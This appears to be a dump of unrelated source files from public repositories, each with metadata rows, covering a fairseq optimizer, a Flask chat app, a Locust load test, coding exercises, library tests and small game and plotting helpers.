# TODO common vars below in parent
lr: List[float] = II("optimization.lr")
@register_optimizer("cpu_adam", dataclass=FairseqCPUAdamConfig)
class FairseqCPUAdam(FairseqOptimizer):
"""Adam optimizer for fairseq, optimized for CPU tensors.
Important note: this optimizer corresponds to the "AdamW" variant of
Adam in its weight decay behavior. As such, it is most closely
analogous to torch.optim.AdamW from PyTorch.
"""
def __init__(self, cfg: DictConfig, params):
super().__init__(cfg)
self._optimizer = CPUAdam(params, **self.optimizer_config)
@property
def optimizer_config(self):
"""
Return a kwarg dictionary that will be used to override optimizer
args stored in checkpoints. This allows us to load a checkpoint and
resume training using a different set of optimizer args, e.g., with a
different learning rate.
"""
return {
"lr": self.cfg.lr[0]
if isinstance(self.cfg.lr, Collection)
else self.cfg.lr,
"betas": eval(self.cfg.adam_betas),
"eps": self.cfg.adam_eps,
"weight_decay": self.cfg.weight_decay,
"use_fp16_stats": self.cfg.fp16_adam_stats,
}
class CPUAdam(torch.optim.Optimizer):
optimizer_id = 0
def __init__(
self,
params,
lr=1e-3,
bias_correction=True,
betas=(0.9, 0.999),
eps=1e-8,
weight_decay=0,
use_fp16_stats=False,
):
defaults = {
"lr": lr,
"bias_correction": bias_correction,
"betas": betas,
"eps": eps,
"weight_decay": weight_decay,
}
super().__init__(params, defaults)
self.use_fp16_stats = use_fp16_stats
self.FLOAT16_MAX = 65504.0
if not has_deepspeed:
raise ImportError("Please install DeepSpeed: pip install deepspeed")
self.opt_id = CPUAdam.optimizer_id
CPUAdam.optimizer_id = CPUAdam.optimizer_id + 1
self.ds_opt_adam = _get_cpu_adam()
adamw_mode = True
self.ds_opt_adam.create_adam(
self.opt_id, lr, betas[0], betas[1], eps, weight_decay, adamw_mode
)
@property
def supports_memory_efficient_fp16(self):
return True
@property
def supports_flat_params(self):
return True
@torch.no_grad()
def step(self, closure=None):
loss = None
if closure is not None:
with torch.enable_grad():
loss = closure()
torch.cuda.synchronize()
for group_id, group in enumerate(self.param_groups):
for param_id, p in enumerate(group["params"]):
if p.grad is None:
continue
state = self.state[p]
if len(state) == 0:
state["step"] = 0
dtype = torch.float16 if self.use_fp16_stats else p.data.dtype
# gradient momentums
state["exp_avg"] = torch.zeros_like(
p.data, dtype=dtype, device="cpu"
)
# gradient variances
state["exp_avg_sq"] = torch.zeros_like(
p.data, dtype=dtype, device="cpu"
)
if self.use_fp16_stats:
assert torch.is_floating_point(p.data)
state["exp_avg_scale"] = 1.0
state["exp_avg_sq_scale"] = 1.0
exp_avg, exp_avg_sq = state["exp_avg"], state["exp_avg_sq"]
p_data_bak = p.data # backup of the original data pointer
p.data = p.data.to(dtype=torch.float32, device="cpu")
p.grad.data = p.grad.data.to(dtype=torch.float32, device="cpu")
if self.use_fp16_stats:
exp_avg = exp_avg.float() * state["exp_avg_scale"]
exp_avg_sq = exp_avg_sq.float() * state["exp_avg_sq_scale"]
state["step"] += 1
beta1, beta2 = group["betas"]
self.ds_opt_adam.adam_update(
self.opt_id,
state["step"],
group["lr"],
beta1,
beta2,
group["eps"],
group["weight_decay"],
group["bias_correction"],
p.data,
p.grad.data,
exp_avg,
exp_avg_sq,
)
if p_data_bak.data_ptr() != p.data.data_ptr():
p_data_bak.copy_(p.data)
p.data = p_data_bak
if self.use_fp16_stats:
def inf_norm(t):
return torch.norm(t, float("inf"))
# from github.com/openai/jukebox/blob/master/jukebox/utils/fp16.py
state["exp_avg_scale"], state["exp_avg_sq_scale"] = (
1e-8 + inf_norm(exp_avg) / self.FLOAT16_MAX,
1e-8 + inf_norm(exp_avg_sq) / self.FLOAT16_MAX,
)
state["exp_avg"], state["exp_avg_sq"] = (
(exp_avg / state["exp_avg_scale"]).half(),
(exp_avg_sq / state["exp_avg_sq_scale"]).half(),
)
return loss
| [
"tage@sandbox12.t0ekrjpotp2uhbmhwy0wiwkeya.xx.internal.cloudapp.net"
] | tage@sandbox12.t0ekrjpotp2uhbmhwy0wiwkeya.xx.internal.cloudapp.net |
283ffd52d747f154947973d072bee919f2ecc3b4 | 1819b161df921a0a7c4da89244e1cd4f4da18be4 | /WhatsApp_FarmEasy/env/lib/python3.6/site-packages/eth_abi/__init__.py | 7e82401a942db6ef1a962e3df3d8bead7c14f8b3 | [
"MIT"
] | permissive | sanchaymittal/FarmEasy | 889b290d376d940d9b3ae2fa0620a573b0fd62a0 | 5b931a4287d56d8ac73c170a6349bdaae71bf439 | refs/heads/master | 2023-01-07T21:45:15.532142 | 2020-07-18T14:15:08 | 2020-07-18T14:15:08 | 216,203,351 | 3 | 2 | MIT | 2023-01-04T12:35:40 | 2019-10-19T12:32:15 | JavaScript | UTF-8 | Python | false | false | 234 | py | import pkg_resources
from eth_abi.abi import ( # NOQA
decode_abi,
decode_single,
encode_abi,
encode_single,
is_encodable,
is_encodable_type,
)
__version__ = pkg_resources.get_distribution('eth-abi').version
| [
"sanchaymittal@gmail.com"
] | sanchaymittal@gmail.com |
c01f385292ee0918dc05ac627e8ebf46eacdf133 | aae0880c3199c478d5e5cf3cb09a3c81c7d62d6a | /Python-Chat-App/chatup.py | cf08c445d2dbf1f2019f4257b35a86631080e6b4 | [] | no_license | icerahi/rahi-s-Flask-Projects | ca19b302da3d49f8b6d687be1f739032aa5be3ef | 261a5f89434c51ac611297a8d06fb67b89aaebba | refs/heads/master | 2022-01-18T08:15:55.453228 | 2022-01-06T10:04:31 | 2022-01-06T10:04:31 | 177,303,301 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 588 | py | from flask import Flask, render_template
from flask_socketio import SocketIO, emit
app = Flask(__name__)
app.config[ 'SECRET_KEY' ] = 'jsbcfsbfjefebw237u3gdbdc'
socketio = SocketIO( app )
user="rahi"
@app.route( '/')
def hello():
return render_template( './ChatApp.html' ,user=user)
def messageRecived():
print( 'message was received!!!' )
@socketio.on( 'my event' )
def handle_my_custom_event( json ):
print( 'recived my event: ' + str( json ) )
socketio.emit( 'my response', json, callback=messageRecived )
if __name__ == '__main__':
socketio.run( app, debug = True )
| [
"zanjarwhite@gmail.com"
] | zanjarwhite@gmail.com |
736725eed55dde6e46164dd2c288107c859d462b | 7548c8efccb43b1d8daec719bd7d8ad4a4d03630 | /Last Substring in Lexicographical Order/Leetcode_1163.py | b4b376a7fef9cf5bbba987db4d11cb5d17b3de1b | [] | no_license | arw2019/AlgorithmsDataStructures | fdb2d462ded327857d72245721d3c9677ba1617b | 9164c21ab011c90944f844e3c359093ce6180223 | refs/heads/master | 2023-02-17T11:50:07.418705 | 2021-01-19T19:37:17 | 2021-01-19T19:37:17 | 204,222,584 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 262 | py | class Solution:
def lastSubstring(self, s: str) -> str:
n = len(s)
maxSeen = ""
for i in range(n):
for j in range(i+1, n+1):
if s[i:j] > maxSeen:
maxSeen = s[i:j]
return maxSeen
| [
"noreply@github.com"
] | arw2019.noreply@github.com |
d811b831a0e884d180f0ed6c73ef9be7f7035b4d | 785a06d576cd4f7486a8a4306481392d0b65f621 | /0x03-python-data_structures/7-add_tuple.py | 236d69a2a5ee75720fa955be0a622f52c463ca58 | [] | no_license | LauraPeraltaV85/holbertonschool-higher_level_programming | 7c3d0a99c2dbd4f2f6951999634dbc2ae9acf1c4 | 264fe99bf5fc128d2faf59057e9062c2408e6065 | refs/heads/master | 2021-07-21T07:49:24.049890 | 2020-08-19T00:07:20 | 2020-08-19T00:07:20 | 207,329,486 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 315 | py | #!/usr/bin/python3
def add_tuple(tuple_a=(), tuple_b=()):
x = list(tuple_a)
y = list(tuple_b)
if len(x) < 2:
for e in range(len(x), 2):
x.append(0)
if len(y) < 2:
for e in range(len(y), 2):
y.append(0)
n = [x[0] + y[0], x[1] + y[1]]
return (tuple(n))
| [
"="
] | = |
c15fa2778f95d2ce92f4f32e1f34aacf0e73e8dd | 7d02813987b49c2a69d92b9b2fdf5148af37274f | /case/About_locust/locustfile3.py | e8227e2096b46427177bb2c33ff615d65bc29962 | [] | no_license | xgh321324/api_test | 29e01cbe5f0b7c2df25fb7e781cedf8031140c72 | 2575495baac3ab90adab7a7a85904c38a78dd4b7 | refs/heads/master | 2022-07-23T19:54:39.320828 | 2022-07-02T09:13:35 | 2022-07-02T09:13:35 | 129,185,513 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,894 | py | #coding:utf-8
from locust import HttpLocust,TaskSet,task
import time
import login_lanting
import Hash
'''测试发表渟说接口的性能'''
#定义用户行为
class User(TaskSet):
#下面是请求头header
header = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.108 Safari/537.36 2345Explorer/8.0.0.13547',
'Accept-Encoding': 'gzip',
'X-Requested-With': 'XMLHttpRequest',
'Content-Type': 'application/json',
'requestApp': '2',
'requestclient': '2',
'versionForApp': '4.3.1',
'Authorization': 'Basic YXBpTGFudGluZ0BtZWRsYW5kZXIuY29tOkFwaVRobWxkTWxkQDIwMTM=',
'Connection': 'keep-alive'
}
#发布渟说的入参
t = {
"token": login_lanting.auto_login_by_UID(),
"text": '嘻嘻嘻嘻嘻嘻',
"nonce": Hash.get_digit(),
"timestamp":str(int(time.time()))
}
t['sign'] = Hash.get_sign(t)
#加入圈子的入参
d = {
"token":login_lanting.auto_login_by_UID(),
"group_id":"G00006",
"timestamp":str(int(time.time())),
"nonce":Hash.get_digit()
}
d['sign'] = Hash.get_sign(d)
#task()括号中代表执行压测时的比重
@task(1)
def post_word(self):
u'发布文字渟说'
r = self.client.post('/v1/feed/add',headers = self.header,json=self.t)
result = r.json()
#assert r.json()['code'] == 200
@task(1)
def post_artical(self):
u'发布文章接口'
r = self.client.post('/v1/group/add',headers = self.header,json= self.d)
result = r.json()
class Websiteuser(HttpLocust):
task_set = User
#host = 'http://api.feed.sunnycare.cc'
max_wait = 6000
min_wait = 1000
| [
"34511103+xgh321324@users.noreply.github.com"
] | 34511103+xgh321324@users.noreply.github.com |
fc8469818217fe08269351c9fcc98e6cb3e4d0fb | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /mJpjpgxkxvTY4Qbwf_14.py | f645319a6e0d4c6d6b23568699bd65994ac58ed8 | [] | no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,221 | py | """
Create a function that takes a 5x5 3D list and returns `True` if it has at
least one Bingo, and `False` if it doesn't.
### Examples
bingo_check([
[45, "x", 31, 74, 87],
[64, "x", 47, 32, 90],
[37, "x", 68, 83, 54],
[67, "x", 98, 39, 44],
[21, "x", 24, 30, 52]
]) ➞ True
bingo_check([
["x", 43, 31, 74, 87],
[64, "x", 47, 32, 90],
[37, 65, "x", 83, 54],
[67, 98, 39, "x", 44],
[21, 59, 24, 30, "x"]
]) ➞ True
bingo_check([
["x", "x", "x", "x", "x"],
[64, 12, 47, 32, 90],
[37, 16, 68, 83, 54],
[67, 19, 98, 39, 44],
[21, 75, 24, 30, 52]
]) ➞ True
bingo_check([
[45, "x", 31, 74, 87],
[64, 78, 47, "x", 90],
[37, "x", 68, 83, 54],
[67, "x", 98, "x", 44],
[21, "x", 24, 30, 52]
]) ➞ False
### Notes
Only check for diagnols, horizontals and verticals.
"""
def bingo_check(board):
xs = [(i,j) for i,x in enumerate(board) for j,y in enumerate(x) if y == 'x']
a = [y for x,y in xs]
b = [x for x,y in xs]
return (a.count(a[0]) == 5 or b.count(b[0]) == 5) or all(abs(x[0]-y[0]) == abs(x[1]-y[1]) for x,y in zip(xs, xs[1:]))
| [
"daniel.reich@danielreichs-MacBook-Pro.local"
] | daniel.reich@danielreichs-MacBook-Pro.local |
34cf3416b4a4ed2611d3f51e59388a491836b4e5 | e2a26056efc56aa48522d0d45375b17a9e687c46 | /seismograph/ext/mocker/json_api_mock.py | 5a02a36e227b249cfd748dabf66dc9742d08106f | [] | no_license | pulysak/seismograph | 489f788affb01c3f9f40565ec92c786a319ee11f | 313b74aaa445e8056c732eff3b8cbd6b5692576f | refs/heads/master | 2021-01-18T16:13:07.125954 | 2016-05-06T17:56:34 | 2016-05-06T17:56:34 | 55,637,399 | 0 | 1 | null | 2016-04-06T20:13:53 | 2016-04-06T20:13:53 | null | UTF-8 | Python | false | false | 793 | py | # -*- coding: utf-8 -*-
import re
import json
from .mock import BaseMock
from .base import BaseMockServer
CLEAN_DATA_REGEXP = re.compile(r'^\s{2}|\n|\r$')
FILE_EXTENSIONS = BaseMockServer.__file_extensions__ + ('.json', )
class JsonMock(BaseMock):
__mime_type__ = 'application/json'
__content_type__ = 'application/json'
@property
def body(self):
return json.dumps(self._body)
@property
def json(self):
return self._body
def __on_file__(self, fp):
super(JsonMock, self).__on_file__(fp)
# for pre validation only
self._body = json.loads(
CLEAN_DATA_REGEXP.sub('', self._body),
)
class JsonApiMockServer(BaseMockServer):
__mock_class__ = JsonMock
__file_extensions__ = FILE_EXTENSIONS
| [
"mikhail.trifonov@corp.mail.ru"
] | mikhail.trifonov@corp.mail.ru |
810b327d3d08b2ab36a8903b52b2d06409e9ff01 | 0d37419481a5f3a37d0bbd2c3b1023105c193917 | /tests/loaders/test_factory_command_loader.py | 31cbc65d2e9c0a99b448e93e8c318f6d659606f3 | [
"MIT"
] | permissive | passionsfrucht/cleo | 89e8b4d8595785ac021017815d1d7ebc1fb80da4 | 8dc694ed5ed350403966f93d330654ecb447801b | refs/heads/master | 2023-06-25T20:14:59.578578 | 2021-07-30T15:16:20 | 2021-07-30T15:16:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,151 | py | import pytest
from cleo.commands.command import Command
from cleo.exceptions import CommandNotFoundException
from cleo.loaders.factory_command_loader import FactoryCommandLoader
def command(name: str) -> Command:
command_ = Command()
command_.name = name
return command_
def test_has():
loader = FactoryCommandLoader(
{"foo": lambda: command("foo"), "bar": lambda: command("bar")}
)
assert loader.has("foo")
assert loader.has("bar")
assert not loader.has("baz")
def test_get():
loader = FactoryCommandLoader(
{"foo": lambda: command("foo"), "bar": lambda: command("bar")}
)
assert isinstance(loader.get("foo"), Command)
assert isinstance(loader.get("bar"), Command)
def test_get_invalid_command_raises_error():
loader = FactoryCommandLoader(
{"foo": lambda: command("foo"), "bar": lambda: command("bar")}
)
with pytest.raises(CommandNotFoundException):
loader.get("baz")
def test_names():
loader = FactoryCommandLoader(
{"foo": lambda: command("foo"), "bar": lambda: command("bar")}
)
assert loader.names == ["foo", "bar"]
| [
"sebastien@eustace.io"
] | sebastien@eustace.io |
1f0b3a8eed50e1cd3ee4c3015c77f80304f757f3 | fa4fc25f5ec49433d4162cfbf34a670f39371973 | /backend/PersoRegBackEnd/manage.py | e931fbf4fb184a1d081960cb1602860d00a97246 | [] | no_license | raultr/PerBackbone | 905e7b020cadeec114744cdb39aa9ff890b704bd | e9277886ca6c9fc6aa9233939e0544c1dcf07d37 | refs/heads/master | 2016-08-03T19:40:40.309758 | 2014-11-27T05:58:22 | 2014-11-27T05:58:22 | 26,204,783 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 258 | py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "PersoRegBackEnd.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
| [
"raultr@gmail.com"
] | raultr@gmail.com |
9051d73144ffa7c7785dd0ea1f0e964689305b58 | ef85c7bb57412c86d9ab28a95fd299e8411c316e | /runtime/bindings/python/tests/test_ngraph/test_gather.py | ffa4c20b1d3743b5d5d86692a3379b30b6a541aa | [
"Apache-2.0"
] | permissive | SDxKeeper/dldt | 63bf19f01d8021c4d9d7b04bec334310b536a06a | a7dff0d0ec930c4c83690d41af6f6302b389f361 | refs/heads/master | 2023-01-08T19:47:29.937614 | 2021-10-22T15:56:53 | 2021-10-22T15:56:53 | 202,734,386 | 0 | 1 | Apache-2.0 | 2022-12-26T13:03:27 | 2019-08-16T13:41:06 | C++ | UTF-8 | Python | false | false | 2,717 | py | # Copyright (C) 2018-2021 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import openvino.opset8 as ov
import numpy as np
from tests import xfail_issue_54630
from tests.test_ngraph.util import run_op_node
def test_gather():
input_data = np.array(
[1.0, 1.1, 1.2, 2.0, 2.1, 2.2, 3.0, 3.1, 3.2], np.float32
).reshape((3, 3))
input_indices = np.array([0, 2], np.int32).reshape(1, 2)
input_axis = np.array([1], np.int32)
expected = np.array([1.0, 1.2, 2.0, 2.2, 3.0, 3.2], dtype=np.float32).reshape(
(3, 1, 2)
)
result = run_op_node([input_data], ov.gather, input_indices, input_axis)
assert np.allclose(result, expected)
def test_gather_with_scalar_axis():
input_data = np.array(
[1.0, 1.1, 1.2, 2.0, 2.1, 2.2, 3.0, 3.1, 3.2], np.float32
).reshape((3, 3))
input_indices = np.array([0, 2], np.int32).reshape(1, 2)
input_axis = np.array(1, np.int32)
expected = np.array([1.0, 1.2, 2.0, 2.2, 3.0, 3.2], dtype=np.float32).reshape(
(3, 1, 2)
)
result = run_op_node([input_data], ov.gather, input_indices, input_axis)
assert np.allclose(result, expected)
def test_gather_batch_dims_1():
input_data = np.array([[1, 2, 3, 4, 5],
[6, 7, 8, 9, 10]], np.float32)
input_indices = np.array([[0, 0, 4],
[4, 0, 0]], np.int32)
input_axis = np.array([1], np.int32)
batch_dims = 1
expected = np.array([[1, 1, 5],
[10, 6, 6]], np.float32)
result = run_op_node([input_data], ov.gather, input_indices, input_axis, batch_dims)
assert np.allclose(result, expected)
@xfail_issue_54630
def test_gather_negative_indices():
input_data = np.array(
[1.0, 1.1, 1.2, 2.0, 2.1, 2.2, 3.0, 3.1, 3.2], np.float32
).reshape((3, 3))
input_indices = np.array([0, -1], np.int32).reshape(1, 2)
input_axis = np.array([1], np.int32)
expected = np.array([1.0, 1.2, 2.0, 2.2, 3.0, 3.2], dtype=np.float32).reshape(
(3, 1, 2)
)
result = run_op_node([input_data], ov.gather, input_indices, input_axis)
assert np.allclose(result, expected)
@xfail_issue_54630
def test_gather_batch_dims_1_negative_indices():
input_data = np.array([[1, 2, 3, 4, 5],
[6, 7, 8, 9, 10]], np.float32)
input_indices = np.array([[0, 1, -2],
[-2, 0, 0]], np.int32)
input_axis = np.array([1], np.int32)
batch_dims = 1
expected = np.array([[1, 2, 4],
[9, 6, 6]], np.float32)
result = run_op_node([input_data], ov.gather, input_indices, input_axis, batch_dims)
assert np.allclose(result, expected)
| [
"noreply@github.com"
] | SDxKeeper.noreply@github.com |
6c3c28ac807f8427e5aebe618184ced6913751fb | 07e6fc323f657d1fbfc24f861a278ab57338b80a | /python/pySimE/space/data/table_ChemicalFuels.py | 5adc81686a9a3146a15ceb9362c724897ff52ed8 | [
"MIT"
] | permissive | ProkopHapala/SimpleSimulationEngine | 99cf2532501698ee8a03b2e40d1e4bedd9a12609 | 47543f24f106419697e82771289172d7773c7810 | refs/heads/master | 2022-09-05T01:02:42.820199 | 2022-08-28T10:22:41 | 2022-08-28T10:22:41 | 40,007,027 | 35 | 4 | null | null | null | null | UTF-8 | Python | false | false | 355 | py |
dict_AirBurnFuel = {
# name energyDensity energyDensity+O2 density
'LH2' : [ 141.86, 15.7622222222, 0.07085 ],
'LCH4': [ 55.6, 11.12, 0.42262 ],
'gasoline': [ 42.8, 0.7197]
}
dict_ChemicalFuelCompositions = {
# name fuel oxidizer energyDensity exhaustVelocity
'LOX/LH2' : ["H2", "O2", 141.86, 4 ],
'LOX/LH2' : []
} | [
"ProkopHapala@gmail.com"
] | ProkopHapala@gmail.com |
80a8d87c8b06eed099d2a9ed2758407c5cd9490a | 7b76e80f2057d78a721373e8818e153eecebe8f0 | /Examples/functions/lambda with re.py | 824e7e963ca5fd04df7e567717b169cfd8b5ef9d | [] | no_license | dev-area/Python | c744cf6eb416a74a70ad55d2bcfa8a6166adc45d | 1421a1f154fe314453d2da8b0fafae79aa5086a6 | refs/heads/master | 2023-02-01T10:37:47.796198 | 2020-10-15T19:33:49 | 2020-10-15T19:33:49 | 86,337,870 | 35 | 44 | null | 2023-01-12T09:02:59 | 2017-03-27T13:20:49 | Jupyter Notebook | UTF-8 | Python | false | false | 1,165 | py | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Thu May 11 17:40:55 2017
@author: parallels
"""
def addtax(val):
return val*1.17
nums = [10,200,30]
inters = [1.17,1.18,1.16]
numstax = map(addtax,nums)
print numstax
numstax = map(lambda val:val*1.17,nums)
print numstax
numstax = map(lambda val,inter:val*inter,nums,inters)
print numstax
maxval = reduce(lambda a,b: a if (a > b) else b,nums)
print maxval
import re
codes = {}
names = ['zero','wun','two','tree','fower','fife','six','seven',
'ait','niner','alpha','bravo','charlie','delta','echo',
'foxtrot','golf','hotel','india','juliet','kilo','lima',
'mike','november','oscar','papa','quebec','romeo',
'sierra','tango','uniform','victor','whisky','xray',
'yankee','zulu']
for key in (xrange(0,10)):
codes[str(key)] = names[key]
for key in (xrange(ord('A'),ord('Z')+1)):
codes[chr(key)] = names[key - ord('A')+10]
reg = 'WG07 OKD'
result = re.sub(r'(\w)',
lambda m: codes[m.groups()[0]]+' ', reg)
testy = 'The quick brown fox the jumps over the lazy dog'
m = re.search(r"(quick|slow).*(the|camel)", testy)
| [
"liranbh@gmail.com"
] | liranbh@gmail.com |
f21a38c18c4969ba4ffb413b52af5cf14d3ccf8c | 55c0df26e4891310a88e5245c41f3ffd1dbcd143 | /list_and_sting9.py | f94e9989913ef9f40170697bbcf4857e2b7152bf | [] | no_license | yiguming/coding | 506446a6ab0d4c63c74a3b90bceeff8d1db78b57 | d3d516a0719c9ba5b5a18d31714dd32601f05f4f | refs/heads/master | 2016-09-03T07:11:11.822498 | 2015-03-07T12:52:56 | 2015-03-07T12:52:56 | 31,662,569 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 182 | py | #!/usr/bin/python
def connectlist(list1,list2):
for item in list2:
list1.append(item)
return list1
list1=[1,2,3,4,5]
list2=[2,3,4,5,1,2]
print connectlist(list1,list2)
| [
"439309415@qq.com"
] | 439309415@qq.com |
56d459bb14c3167b06507f072a6f520affe19dee | 1020a87ba3569c879478b6a88f73da606f204c34 | /greendoge/util/validate_alert.py | 0427b5cf2f4fbde8303fe845c999df00e41390c3 | [
"Apache-2.0"
] | permissive | MIGPOOL/test-blockchain | deeceaa5d7c6d24e528092ef32036aff8149baff | 567fd1265b6a27f2f4e21c7787e39072e4b7c085 | refs/heads/main | 2023-08-22T03:27:19.638361 | 2021-10-26T22:42:42 | 2021-10-26T22:42:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,749 | py | import json
from pathlib import Path
from blspy import AugSchemeMPL, PublicKeyMPL, SignatureMPL
from greendoge.util.byte_types import hexstr_to_bytes
from greendoge.util.hash import std_hash
def validate_alert_file(file_path: Path, pubkey: str) -> bool:
text = file_path.read_text()
validated = validate_alert(text, pubkey)
return validated
def validate_alert(text: str, pubkey: str) -> bool:
json_obj = json.loads(text)
data = json_obj["data"]
message = bytes(data, "UTF-8")
signature = json_obj["signature"]
signature = SignatureMPL.from_bytes(hexstr_to_bytes(signature))
pubkey_bls = PublicKeyMPL.from_bytes(hexstr_to_bytes(pubkey))
sig_match_my = AugSchemeMPL.verify(pubkey_bls, message, signature)
return sig_match_my
def create_alert_file(alert_file_path: Path, key, genesis_challenge_preimage: str):
bytes_preimage = bytes(genesis_challenge_preimage, "UTF-8")
genesis_challenge = std_hash(bytes_preimage)
file_dict = {
"ready": True,
"genesis_challenge": genesis_challenge.hex(),
"genesis_challenge_preimage": genesis_challenge_preimage,
}
data: str = json.dumps(file_dict)
signature = AugSchemeMPL.sign(key, bytes(data, "utf-8"))
file_data = {"data": data, "signature": f"{signature}"}
file_data_json = json.dumps(file_data)
alert_file_path.write_text(file_data_json)
def create_not_ready_alert_file(alert_file_path: Path, key):
file_dict = {
"ready": False,
}
data: str = json.dumps(file_dict)
signature = AugSchemeMPL.sign(key, bytes(data, "utf-8"))
file_data = {"data": data, "signature": f"{signature}"}
file_data_json = json.dumps(file_data)
alert_file_path.write_text(file_data_json)
| [
"83430349+lionethan@users.noreply.github.com"
] | 83430349+lionethan@users.noreply.github.com |
fd2c477fcf5e490a75267f92c43ca77e689469dc | b4164c87460840fff47ee84929834624d07b346c | /tools.py | c77d1712a27642381dc2faa413e09415a8fa666d | [] | no_license | tlinnet/winpython | 23ffc5b4689731d9ee31a2c22e6924c6af68f545 | febc9eaa4d0ce7dc3d632a90cfb5ca29f72504a1 | refs/heads/master | 2021-01-23T23:45:19.209163 | 2018-03-04T14:44:59 | 2018-03-04T14:44:59 | 122,732,431 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,224 | py | import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import matplotlib.mlab as mlab
# https://stackoverflow.com/questions/4700614/how-to-put-the-legend-out-of-the-plot
d = {
'Alder':{
'18-24':0.12,
'25-34':0.16,
'35-44':0.19,
'45-54':0.19,
'55-64':0.17,
'65+':0.09,
'18-':0.08,
},
'Køn':{
'M':0.51,
'K':0.49
},
'Region':{
'Hovedstaden':0.30,
'Sjælland':0.14,
'Syddanmark':0.21,
'Midtjylland':0.22,
'Nordjylland':0.11,
'Ved ikke':0.02,
}
}
def get_sample_ind(N=1000, dists=None):
all_sample = []
for i in range(N):
sample = []
for dist in dists:
groups = list(dist.keys())
props = [dist[j] for j in groups]
#print(groups, np.sum(props))
s = np.random.choice(groups, 1, p=props)
sample.append(s[0])
#print(sample)
all_sample.append(sample)
return all_sample
def get_sample(N=1000, dists=None):
    """Draw N respondents by sampling each distribution as a whole column.

    For every dict in ``dists`` (category -> probability), N categories are
    drawn at once; the columns are then transposed into per-respondent
    tuples. Returns a list of N tuples.
    """
    columns = []
    for dist in dists:
        categories = list(dist.keys())
        weights = [dist[category] for category in categories]
        drawn = np.random.choice(categories, N, p=weights)
        columns.append(list(drawn))
    # Transpose column-wise draws into one tuple per respondent.
    return list(zip(*columns))
def get_std_sample(N=1000):
    """Draw a standard demographic sample and compare it to the reference.

    Returns ``(df, df_i)`` where ``df`` is the raw sample (one row per
    respondent, plus constant 'Alle' and 'val' columns) and ``df_i`` maps
    each label to a DataFrame holding the observed percentages next to the
    reference percentages from the module-level distribution ``d``.
    """
    labels = ['Alder', 'Køn', 'Region']
    # Sampling weights come from the module-level reference distribution d.
    dists = [d[label] for label in labels]
    sample = get_sample(N=N, dists=dists)
    df = pd.DataFrame.from_records(sample, columns=labels)
    df['Alle'] = pd.Series(['Alle'] * N, index=df.index)
    df['val'] = pd.Series(np.ones(N), index=df.index)
    # Per-label comparison: observed share vs reference share, in percent.
    df_i = {}
    for label in labels:
        observed = df.groupby(label)[label].count() / df[label].count() * 100
        reference = pd.Series(d[label]) * 100
        reference.name = label + "_DST"
        df_i[label] = pd.concat([observed, reference], axis=1)
    return df, df_i
def create_rand_series(df=None, x_avg=None, ex=None):
    """Return a Series of normal random values aligned with ``df``'s index.

    ``ex`` is the fractional (relative) uncertainty, so the standard
    deviation of the draw is ``ex * x_avg`` around the mean ``x_avg``.
    """
    count = len(df.index)
    std_dev = ex * x_avg
    values = std_dev * np.random.randn(count) + x_avg
    return pd.Series(values, index=df.index)
def create_boxplot_hist(df=None, col=None):
    """Plot a horizontal boxplot above a histogram of ``df[col]``.

    The histogram is normalised and overlaid with a fitted normal curve;
    vertical lines mark 180, the mean, and +/- 1 and 2 standard deviations.
    Returns ``(figure, boxplot_axis, histogram_axis, mean, sigma)``.
    """
    f, (ax1, ax2) = plt.subplots(2, 1, figsize=(10, 5), sharex=True,
                                 gridspec_kw={'height_ratios': [1, 2]})
    f.subplots_adjust(hspace=0)
    v = df[col]
    ax1.boxplot(v, notch=False, sym=None, vert=False)
    mean = np.mean(v)
    sigma = np.std(v)
    x = np.linspace(min(v), max(v), len(v))
    # Bug fix: `normed=True` was removed from Axes.hist in Matplotlib 3.x;
    # `density=True` is the equivalent (supported since Matplotlib 2.1).
    ax2.hist(v, density=True, bins=20)
    # Bug fix: matplotlib.mlab.normpdf was removed in Matplotlib 3.1;
    # compute the normal pdf directly.
    pdf = np.exp(-((x - mean) ** 2) / (2.0 * sigma ** 2)) / (sigma * np.sqrt(2.0 * np.pi))
    p = ax2.plot(x, pdf)
    c = p[-1].get_color()
    ax2.axvline(x=180, c="k")  # fixed reference line at 180
    ax2.axvline(x=mean, c=c)
    ax2.axvline(x=mean + sigma, c="b")
    ax2.axvline(x=mean - sigma, c="b")
    ax2.axvline(x=mean + 2 * sigma, c="b")
    ax2.axvline(x=mean - 2 * sigma, c="b")
    return f, ax1, ax2, mean, sigma
"tlinnet@gmail.com"
] | tlinnet@gmail.com |
ce4ba75c7a043617174f004cdba4560d1e3f1e77 | 76fa6f5571e983de2ed7c71424377442d38ab326 | /enemies/base_enemy.py | 6c53ebea9540ef3a2a4b4d9c7109f085d5eacf17 | [] | no_license | Asingjr2/dungeon_quest_py | 1463f28b94a7a4a0e7263f184803e627bd88b97c | 41c9b41485f552657405ddb977ddfa86a02cc162 | refs/heads/master | 2021-06-11T05:14:00.295784 | 2020-10-19T12:47:55 | 2020-10-19T12:47:55 | 128,494,057 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,456 | py | """Module contains base type for enemies user will face."""
class Enemy(object):
    """Base class of enemy that will attack heroes.

    Attributes include name, health, magic, strength, defense, and
    intelligence.  Methods include a liveness check and a printable summary
    of all character stats.
    """
